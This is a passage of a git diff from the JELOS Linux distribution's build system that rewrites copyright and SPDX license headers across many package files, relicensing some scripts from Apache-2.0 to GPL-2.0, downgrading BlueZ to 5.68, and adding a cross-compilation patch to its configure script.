b/packages/lang/Python3/package.mk index dc94d0d24..3f8330c4d 100644 --- a/packages/lang/Python3/package.mk +++ b/packages/lang/Python3/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2017-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="Python3" # When changing PKG_VERSION remember to sync PKG_PYTHON_VERSION! diff --git a/packages/lang/gcc/package.mk b/packages/lang/gcc/package.mk index 333025862..99f237038 100644 --- a/packages/lang/gcc/package.mk +++ b/packages/lang/gcc/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="gcc" PKG_VERSION="12.3.0" diff --git a/packages/lang/jdk-zulu/package.mk b/packages/lang/jdk-zulu/package.mk index 1bddae0f6..3c848f057 100644 --- a/packages/lang/jdk-zulu/package.mk +++ b/packages/lang/jdk-zulu/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Peter Vicman (peter.vicman@gmail.com) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="jdk-zulu" PKG_VERSION="20.32.11-ca-jdk20.0.2" PKG_LICENSE="GPLv2" diff --git a/packages/misc/modules/autostart/001-sync-modules b/packages/misc/modules/autostart/001-sync-modules index 515992aea..19c7757f8 100644 --- a/packages/misc/modules/autostart/001-sync-modules +++ b/packages/misc/modules/autostart/001-sync-modules @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/misc/modules/package.mk b/packages/misc/modules/package.mk index 041cc431d..05cc18fe4 100644 --- a/packages/misc/modules/package.mk +++ b/packages/misc/modules/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="modules" PKG_VERSION="" diff --git a/packages/misc/modules/sources/Install JELOS.sh b/packages/misc/modules/sources/Install JELOS.sh index 20d4d42f0..5399cff85 100755 --- a/packages/misc/modules/sources/Install JELOS.sh +++ b/packages/misc/modules/sources/Install JELOS.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source /etc/profile diff --git a/packages/misc/modules/sources/Remove ._ Files.sh b/packages/misc/modules/sources/Remove ._ Files.sh index d68a07829..fed2cce06 100755 --- a/packages/misc/modules/sources/Remove ._ Files.sh +++ b/packages/misc/modules/sources/Remove ._ Files.sh @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile clear diff --git a/packages/misc/modules/sources/Start 32bit Retroarch.sh b/packages/misc/modules/sources/Start 32bit Retroarch.sh index 0986cdd57..c743d2974 100755 --- a/packages/misc/modules/sources/Start 32bit Retroarch.sh +++ b/packages/misc/modules/sources/Start 32bit Retroarch.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source /etc/profile diff --git a/packages/misc/modules/sources/Start 64bit Retroarch.sh b/packages/misc/modules/sources/Start 64bit Retroarch.sh index 5e3d6d914..ed0de3dd4 100755 --- a/packages/misc/modules/sources/Start 64bit Retroarch.sh +++ b/packages/misc/modules/sources/Start 64bit Retroarch.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source /etc/profile diff --git a/packages/misc/modules/sources/Start PortMaster.sh b/packages/misc/modules/sources/Start PortMaster.sh index c1d5dc8de..196947fb9 100755 --- a/packages/misc/modules/sources/Start PortMaster.sh +++ b/packages/misc/modules/sources/Start PortMaster.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) (https://github.com/brooksytech source /etc/profile diff --git a/packages/misc/modules/sources/fileman.sh b/packages/misc/modules/sources/fileman.sh index 1b367d7ac..9e9580c6a 100755 --- a/packages/misc/modules/sources/fileman.sh +++ b/packages/misc/modules/sources/fileman.sh @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "FileMan" diff --git a/packages/multimedia/gmu/package.mk b/packages/multimedia/gmu/package.mk index 77509d18a..3febb6391 100644 --- a/packages/multimedia/gmu/package.mk +++ b/packages/multimedia/gmu/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="gmu" PKG_VERSION="cf21c3f" diff --git a/packages/multimedia/gmu/scripts/start_gmu.sh b/packages/multimedia/gmu/scripts/start_gmu.sh index c621cbf9f..5e6f41d01 100644 --- a/packages/multimedia/gmu/scripts/start_gmu.sh +++ b/packages/multimedia/gmu/scripts/start_gmu.sh @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/multimedia/gstreamer/gst-plugins-bad/package.mk b/packages/multimedia/gstreamer/gst-plugins-bad/package.mk index 7cbb97062..e8f84022e 100644 --- a/packages/multimedia/gstreamer/gst-plugins-bad/package.mk +++ b/packages/multimedia/gstreamer/gst-plugins-bad/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2022-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="gst-plugins-bad" PKG_VERSION="" diff --git a/packages/multimedia/libhdhomerun/package.mk b/packages/multimedia/libhdhomerun/package.mk index 473a1786b..44fcb571a 100644 --- a/packages/multimedia/libhdhomerun/package.mk +++ b/packages/multimedia/libhdhomerun/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libhdhomerun" PKG_VERSION="bc207f2" diff --git a/packages/multimedia/libplacebo/package.mk b/packages/multimedia/libplacebo/package.mk index 6d901669b..3cb00959b 100644 --- a/packages/multimedia/libplacebo/package.mk +++ b/packages/multimedia/libplacebo/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libplacebo" PKG_VERSION="839e847e32ff0b6bb0a0c033b700245de6a333dc" diff --git a/packages/multimedia/libvpx/package.mk b/packages/multimedia/libvpx/package.mk index b39185d5f..5a020a754 100644 --- a/packages/multimedia/libvpx/package.mk +++ b/packages/multimedia/libvpx/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libvpx" PKG_VERSION="d6eb969" # 1.13.0 diff --git a/packages/multimedia/mpv/package.mk b/packages/multimedia/mpv/package.mk index 1e7cca6e0..bf1948ad2 100644 --- a/packages/multimedia/mpv/package.mk +++ b/packages/multimedia/mpv/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mpv" PKG_VERSION="662650bde319a57733bb4ea80f709a018d247f1d" diff --git a/packages/multimedia/vlc/package.mk b/packages/multimedia/vlc/package.mk index 23389ed42..d261dc778 100644 --- a/packages/multimedia/vlc/package.mk +++ b/packages/multimedia/vlc/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="vlc" PKG_VERSION="3.0.18" diff --git a/packages/multimedia/x264/package.mk b/packages/multimedia/x264/package.mk index 90909f18e..a117233df 100644 --- a/packages/multimedia/x264/package.mk +++ b/packages/multimedia/x264/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="x264" PKG_VERSION="a8b68ebfaa68621b5ac8907610d3335971839d52" diff --git a/packages/network/bluez/package.mk b/packages/network/bluez/package.mk index 2c51d8873..9ace7412b 100644 --- a/packages/network/bluez/package.mk +++ b/packages/network/bluez/package.mk @@ -3,7 +3,7 @@ # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) PKG_NAME="bluez" -PKG_VERSION="5.69" +PKG_VERSION="5.68" PKG_LICENSE="GPL" PKG_SITE="http://www.bluez.org/" PKG_URL="https://www.kernel.org/pub/linux/bluetooth/${PKG_NAME}-${PKG_VERSION}.tar.xz" diff --git a/packages/network/bluez/patches/bluez-13-configure-Check-ell-path.patch b/packages/network/bluez/patches/bluez-13-configure-Check-ell-path.patch new file mode 100644 index 000000000..bd9626e22 --- /dev/null +++ b/packages/network/bluez/patches/bluez-13-configure-Check-ell-path.patch @@ -0,0 +1,34 @@ +From 124187ef9abed60a7c40f751153e9c4516cd1f91 Mon Sep 17 00:00:00 2001 +From: Rudi Heitbaum +Date: Sat, 1 Jul 2023 01:31:20 +0000 +Subject: [PATCH] configure: Check ell path + +Use of AC_CHECK_FILE prevents cross compilation. +Instead use test to support cross compiling. + +Signed-off-by: Rudi Heitbaum +--- + configure.ac | 7 ++++--- + 1 file changed, 4 insertions(+), 3 deletions(-) + +diff --git a/configure.ac b/configure.ac +index eff297960..bc7edfcd3 100644 +--- a/configure.ac ++++ b/configure.ac +@@ -298,9 +298,10 @@ if (test "${enable_external_ell}" = "yes"); then + AC_SUBST(ELL_LIBS) + fi + if (test "${enable_external_ell}" != "yes"); then +- AC_CHECK_FILE(${srcdir}/ell/ell.h, dummy=yes, +- AC_CHECK_FILE(${srcdir}/../ell/ell/ell.h, dummy=yes, +- AC_MSG_ERROR(ELL source is required or use --enable-external-ell))) ++ if (test ! -f ${srcdir}/ell/ell.h) && ++ (test ! -f ${srcdir}/../ell/ell/ell.h); then ++ AC_MSG_ERROR(ELL source is required or use --enable-external-ell) ++ fi + fi + AM_CONDITIONAL(EXTERNAL_ELL, test "${enable_external_ell}" = "yes" || + (test "${enable_btpclient}" != "yes" && +-- +2.34.1 + diff --git a/packages/network/connman/package.mk b/packages/network/connman/package.mk index 7a8a7a0f1..9953f8398 100644 --- a/packages/network/connman/package.mk +++ b/packages/network/connman/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="connman" PKG_VERSION="7a0bc35c4b2d9bd1c6fd76866a8a86807a626591" diff --git a/packages/network/ethtool/package.mk b/packages/network/ethtool/package.mk index d197bb92a..1979a6d23 100644 --- a/packages/network/ethtool/package.mk +++ b/packages/network/ethtool/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="ethtool" PKG_VERSION="6.3" diff --git a/packages/network/hostapd/package.mk b/packages/network/hostapd/package.mk index a59fb1592..602d4e4c9 100644 --- a/packages/network/hostapd/package.mk +++ b/packages/network/hostapd/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="hostapd" PKG_VERSION="2.10" diff --git a/packages/network/libmnl/package.mk b/packages/network/libmnl/package.mk index 96416b4b2..95ccbbb69 100644 --- a/packages/network/libmnl/package.mk +++ b/packages/network/libmnl/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libmnl" PKG_VERSION="1.0.5" diff --git a/packages/network/libnftnl/package.mk b/packages/network/libnftnl/package.mk index 71971e658..9afda0458 100644 --- a/packages/network/libnftnl/package.mk +++ b/packages/network/libnftnl/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libnftnl" PKG_VERSION="1.2.5" diff --git a/packages/network/libnl/package.mk b/packages/network/libnl/package.mk index 6afc88b0b..e1df30cca 100644 --- a/packages/network/libnl/package.mk +++ b/packages/network/libnl/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libnl" PKG_VERSION="3.7.0" diff --git a/packages/network/lynx/package.mk b/packages/network/lynx/package.mk index 5da605a0e..a018919d9 100644 --- a/packages/network/lynx/package.mk +++ b/packages/network/lynx/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023 Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="lynx" PKG_VERSION="2.8.9rel.1" diff --git a/packages/network/netbase/package.mk b/packages/network/netbase/package.mk index 697f6d6ab..ef66b4db9 100644 --- a/packages/network/netbase/package.mk +++ b/packages/network/netbase/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2017-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="netbase" PKG_VERSION="6.4" diff --git a/packages/network/nss-mdns/package.mk b/packages/network/nss-mdns/package.mk index 08664931d..2bc40446d 100644 --- a/packages/network/nss-mdns/package.mk +++ b/packages/network/nss-mdns/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="nss-mdns" PKG_VERSION="0.15.1" diff --git a/packages/network/rclone/package.mk b/packages/network/rclone/package.mk index 473ef6248..5cea18fbd 100644 --- a/packages/network/rclone/package.mk +++ b/packages/network/rclone/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present Xargon (https://github.com/XargonWan) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="rclone" PKG_VERSION="1.63.1" diff --git a/packages/network/rclone/sources/cloud_backup b/packages/network/rclone/sources/cloud_backup index 36270d291..7ae658685 100755 --- a/packages/network/rclone/sources/cloud_backup +++ b/packages/network/rclone/sources/cloud_backup @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) CONFIGPATH="/storage/.config" diff --git a/packages/network/rclone/sources/cloud_restore b/packages/network/rclone/sources/cloud_restore index 085cb6fd3..78404923b 100755 --- a/packages/network/rclone/sources/cloud_restore +++ b/packages/network/rclone/sources/cloud_restore @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) CONFIGPATH="/storage/.config" diff --git a/packages/network/rclone/sources/rclonectl b/packages/network/rclone/sources/rclonectl index 322a90bf1..a0d154fa7 100755 --- a/packages/network/rclone/sources/rclonectl +++ b/packages/network/rclone/sources/rclonectl @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) CONFIGPATH="/storage/.config" diff --git a/packages/network/syncthing/package.mk b/packages/network/syncthing/package.mk index 7bee28f89..491edce07 100644 --- a/packages/network/syncthing/package.mk +++ b/packages/network/syncthing/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="syncthing" PKG_VERSION="1.23.7" diff --git a/packages/network/syncthing/sources/start_syncthing.sh b/packages/network/syncthing/sources/start_syncthing.sh index b60e4ff0b..e1f3175da 100755 --- a/packages/network/syncthing/sources/start_syncthing.sh +++ b/packages/network/syncthing/sources/start_syncthing.sh @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/network/wireguard-tools/package.mk b/packages/network/wireguard-tools/package.mk index 91e1f5301..1856f1f2a 100644 --- a/packages/network/wireguard-tools/package.mk +++ b/packages/network/wireguard-tools/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="wireguard-tools" PKG_VERSION="v1.0.20210914" diff --git a/packages/network/wireless-regdb/package.mk b/packages/network/wireless-regdb/package.mk index 6589dddd0..bc276aefd 100644 --- a/packages/network/wireless-regdb/package.mk +++ b/packages/network/wireless-regdb/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="wireless-regdb" PKG_VERSION="2023.05.03" diff --git a/packages/network/wpa_supplicant/package.mk b/packages/network/wpa_supplicant/package.mk index 7270a1af1..d3a5dbffb 100644 --- a/packages/network/wpa_supplicant/package.mk +++ b/packages/network/wpa_supplicant/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="wpa_supplicant" PKG_VERSION="2.10" diff --git a/packages/network/wsdd2/package.mk b/packages/network/wsdd2/package.mk index b91baa638..ff6974a6a 100644 --- a/packages/network/wsdd2/package.mk +++ b/packages/network/wsdd2/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2021-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="wsdd2" PKG_VERSION="1.8.7" diff --git a/packages/print/freetype/package.mk b/packages/print/freetype/package.mk index 97936d2a0..326093f80 100644 --- a/packages/print/freetype/package.mk +++ b/packages/print/freetype/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="freetype" PKG_VERSION="2.13.0" diff --git a/packages/print/poppler/package.mk b/packages/print/poppler/package.mk index f9b58b60e..b53934eb7 100644 --- a/packages/print/poppler/package.mk +++ b/packages/print/poppler/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="poppler" PKG_VERSION="adf710ee" diff --git a/packages/python/devel/MarkupSafe/package.mk b/packages/python/devel/MarkupSafe/package.mk index b25738c36..5ecaebb2f 100644 --- a/packages/python/devel/MarkupSafe/package.mk +++ b/packages/python/devel/MarkupSafe/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2014 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="MarkupSafe" PKG_VERSION="2.1.3" diff --git a/packages/python/devel/jinja2/package.mk b/packages/python/devel/jinja2/package.mk index 0093e39c3..06c177ab6 100644 --- a/packages/python/devel/jinja2/package.mk +++ b/packages/python/devel/jinja2/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2021-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # PKG_NAME="jinja2" PKG_VERSION="b08cd4b" # 3.1.2 diff --git a/packages/python/devel/meson/package.mk b/packages/python/devel/meson/package.mk index 79cbbe37b..b44bf93ca 100644 --- a/packages/python/devel/meson/package.mk +++ b/packages/python/devel/meson/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="meson" PKG_VERSION="1.2.1" diff --git a/packages/security/gnupg/package.mk b/packages/security/gnupg/package.mk index e3e409c8c..d5fddb1d6 100644 --- a/packages/security/gnupg/package.mk +++ b/packages/security/gnupg/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="gnupg" PKG_VERSION="1.4.23" diff --git a/packages/security/gnutls/package.mk b/packages/security/gnutls/package.mk index dddf5c354..1fb98e9c3 100644 --- a/packages/security/gnutls/package.mk +++ b/packages/security/gnutls/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2014 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="gnutls" PKG_VERSION="3.8.1" diff --git a/packages/security/libsodium/package.mk b/packages/security/libsodium/package.mk index 05f89ff98..6e1c178b8 100644 --- a/packages/security/libsodium/package.mk +++ b/packages/security/libsodium/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-only # Copyright (C) 2022-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libsodium" PKG_VERSION="a3f200a" diff --git a/packages/security/nettle/package.mk b/packages/security/nettle/package.mk index 71d7543b3..bb9408f2e 100644 --- a/packages/security/nettle/package.mk +++ b/packages/security/nettle/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2014 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="nettle" PKG_VERSION="3.9.1" diff --git a/packages/security/nspr/package.mk b/packages/security/nspr/package.mk index edba83d5d..b8531b628 100644 --- a/packages/security/nspr/package.mk +++ b/packages/security/nspr/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="nspr" PKG_VERSION="4.35" diff --git a/packages/security/nss/package.mk b/packages/security/nss/package.mk index f8a1ae1fb..bacae09c0 100644 --- a/packages/security/nss/package.mk +++ b/packages/security/nss/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="nss" PKG_VERSION="3.92" diff --git a/packages/sysutils/autostart/package.mk b/packages/sysutils/autostart/package.mk index 3e8eb38f8..7e8bca8fd 100755 --- a/packages/sysutils/autostart/package.mk +++ b/packages/sysutils/autostart/package.mk @@ -1,10 +1,10 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="autostart" PKG_VERSION="" PKG_ARCH="any" -PKG_LICENSE="apache2" +PKG_LICENSE="GPLv2" PKG_SITE="" PKG_URL="" PKG_DEPENDS_TARGET="toolchain systemd" diff --git a/packages/sysutils/autostart/profile.d/002-autostart b/packages/sysutils/autostart/profile.d/002-autostart index 72035afca..e95d6df39 100644 --- a/packages/sysutils/autostart/profile.d/002-autostart +++ b/packages/sysutils/autostart/profile.d/002-autostart @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Apply device quirks if [ -e "/sys/firmware/devicetree/base/model" ] diff --git a/packages/sysutils/autostart/sources/autostart b/packages/sysutils/autostart/sources/autostart index 9b370184d..492ab0733 100755 --- a/packages/sysutils/autostart/sources/autostart +++ b/packages/sysutils/autostart/sources/autostart @@ -1,6 +1,6 @@ 